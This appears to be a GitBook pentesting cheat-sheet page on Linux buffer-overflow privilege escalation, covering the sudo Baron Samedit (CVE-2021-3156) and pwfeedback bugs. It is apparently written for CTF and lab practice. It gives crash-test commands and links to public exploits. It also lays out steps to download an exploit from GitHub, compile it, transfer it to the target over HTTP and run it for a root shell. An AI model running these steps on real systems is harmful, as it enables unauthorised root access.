Linux Privilege Escalation
  • Ansible Playbook Privilege Escalation
  • Apache Conf Privilege Escalation
  • Bash eq Privilege Escalation
  • Buffer Overflow Privilege Escalation
  • Chrome Remote Debugger Pentesting
  • Doas Privilege Escalation
  • Ghidra Debug Mode RCE
  • Gnuplot Privilege Escalation
  • LXC/LXD (Linux Container/Daemon) Privilege Escalation
  • Linux Privilege Escalation
  • Mozilla Pentesting
  • OpenSSL Privilege Escalation
  • Pip Download Code Execution
  • PolKit Privilege Escalation
  • Python Eval Code Execution
  • Python Jails Escape
  • Python Privilege Escalation
  • Python Yaml Privilege Escalation
  • Ruby Privilege Escalation
  • Rust Privilege Escalation
  • SSSD Privilege Escalation
  • Shared Library Hijacking
  • Snapd Privilege Escalation
  • Sudo ClamAV Privilege Escalation
  • Sudo Dstat Privilege Escalation
  • Sudo Exiftool Privilege Escalation
  • Sudo Fail2ban Privilege Escalation
  • Sudo Git Privilege Escalation
  • Sudo Java Privilege Escalation
  • Sudo OpenVPN Privilege Escalation
  • Sudo Path Traversal Privilege Escalation
  • Sudo Privilege Escalation
  • Sudo Privilege Escalation by Overriding Shared Library
  • Sudo Reboot Privilege Escalation
  • Sudo Screen Privilege Escalation
  • Sudo Service Privilege Escalation
  • Sudo Shutdown, Poweroff Privilege Escalation
  • Sudo Systemctl Privilege Escalation
  • Sudo Tee Privilege Escalation
  • Sudo Umount Privilege Escalation
  • Sudo Vim Privilege Escalation
  • Sudo Wall Privilege Escalation
  • Sudo Wget Privilege Escalation
  • Sudoedit Privilege Escalation
  • Tar Wildcard Injection PrivEsc
  • Update-Motd Privilege Escalation
  • irb (Interactive Ruby Shell) Privilege Escalation
  • Linux Backdoors
  • Linux Pivoting
  • Post eploitation
Powered by GitBook
On this page

Buffer Overflow Privilege Escalation

Buffer overflow in Linux might be vulnerable to privilege escalation (PrivEsc).

Baron Samedit (Heap Buffer Overflow) CVE-2021-3156

1. Check Vulnerability to Overwrite Heap Buffer in Target Machine

sudoedit -s '\' $(python3 -c 'print("A"*1000)')
malloc(): invalid size (unsorted)
Aborted
Copied!

2. Proof of Concept

There are various PoC online.

  • https://github.com/lockedbyte/CVE-Exploits/tree/master/CVE-2021-3156.

  • https://github.com/blasty/CVE-2021-3156

Pwfeedback

1. Check Enabling the Pwfeedback in /etc/sudoers

If so, when running sudo command and inputting password, asterisk will be displayed. You can make it the buffer overflow.

cat /etc/sudoers

# -------------------------------------------

...
Defaults pwfeadback
...
Copied!

2. Input Long String to Password

perl -e 'print(("A" x 100 . "\x{00}") x 50)' | sudo -S id
# [sudo] password for tryhackme: Segmentation fault
Copied!

3. Download a Payload and Compile in Local Machine

wget https://raw.githubusercontent.com/saleemrashid/sudo-cve-2019-18634/master/exploit.c
gcc -o exploit exploit.c
Copied!

4. Transfer the Payload to Remote Machine

# In local machine
python3 -m http.server 8000

# In remote machine
wget http://<local-ip>:8000/exploit
Copied!

5. Execute the Payload in Remote Machine

After that, you'll get a root shell.

chmod 700 ./exploit
./exploit
PreviousBash eq Privilege EscalationNextChrome Remote Debugger Pentesting

Last updated 1 year ago

  • Baron Samedit (Heap Buffer Overflow) CVE-2021-3156
  • Pwfeedback
Page cover image